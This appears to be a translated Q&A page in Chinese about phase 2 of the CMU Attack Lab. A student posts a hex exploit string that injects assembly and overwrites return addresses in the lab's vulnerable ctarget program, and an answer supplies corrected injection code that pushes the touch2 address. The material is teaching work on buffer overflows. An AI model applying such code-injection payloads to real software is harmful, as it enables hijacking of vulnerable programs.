缓冲区溢出攻击(攻击实验室第 2 阶段)

2024-02-26

我有一个缓冲区溢出实验室,我必须为一个名为攻击实验室 http://csapp.cs.cmu.edu/3e/attacklab.pdf。我处于实验室的第二阶段,我必须将代码作为漏洞利用字符串的一部分注入,以使程序指向函数 touch2() 的地址。我已经到了这样的地步:输出表明它是第 2 阶段的有效解决方案,但随后它说我导致了段错误,然后说我在该阶段失败了。

这是我收到的错误消息

cookie:  0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED

这是我在汇编中的漏洞利用代码

mov1 $0x2d6fc2d5, %rdi
retq

这就是我传递给程序的内容

48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code
00 00 00 00 00 00 00 00 #padding of 0x38, amount needed to overwrite ret address 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #address of rsp - 0x38
0d 18 40 00 00 00 00 00 #address of touch2()

我已经在网上查看了教程,并且已经为此工作了几个小时,但我还没有找到解决方案,而且我不确定是什么导致了问题。它说解决方案是有效的,但随后出现段错误并失败。任何帮助将不胜感激,如果有任何需要澄清的地方请告诉我!


攻击实验室最近似乎进行了调整。 您应该避免覆盖堆栈中返回地址的下一部分

相反,您可以使用入栈指令将值添加到堆栈中。 尝试从输入中删除 touch2 地址并使用以下代码。

mov $0x2d6fc2d5, %rdi
pushq $0x40180d
ret
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

缓冲区溢出攻击(攻击实验室第 2 阶段) 的相关文章

随机推荐